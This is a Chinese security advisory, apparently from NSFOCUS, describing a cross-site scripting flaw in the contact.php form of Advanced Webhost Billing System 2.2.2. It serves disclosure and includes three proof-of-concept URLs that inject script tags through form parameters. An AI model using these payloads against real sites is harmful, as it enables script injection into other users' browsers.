安全研究
安全漏洞
Advanced Webhost Billing System contact.php跨站脚本执行漏洞
发布日期:2006-07-29
更新日期:2006-07-31
受影响系统:Total Online Solutions AWBS 2.2.2
描述:
BUGTRAQ ID:
19226
Advanced Webhost Billing System(AWBS)是一款在线购物使用的计费系统。
AWBS的contact.php脚本实现上存在输入验证漏洞,远程攻击者可以利用这些漏洞执行跨站脚本执行攻击,以客户端当前用户权限执行恶意脚本代码。
<*来源:newbinaryfile (
newbinaryfile@gmail.com)
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://[site adres]/contact.php?action=submit&Name='><script>alert('XSS Vulnerability')%3B</script>&EmailAddress=1&AccountUsername=1&Message=1
http://[site adres]/contact.php?action=submit&Name=1&EmailAddress=1&AccountUsername='
><script>alert('XSS Vulnerability')%3B</script>&Message=1
http://[site adres]/action=submit&Name=1&EmailAddress=1&AccountUsername=1&Message=</t
extarea><script>alert('XSS Vulnerability')%3B</script>
建议:
厂商补丁:
Total Online Solutions
----------------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.awbs.com/index.php浏览次数:3949
严重程度:10(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障 |
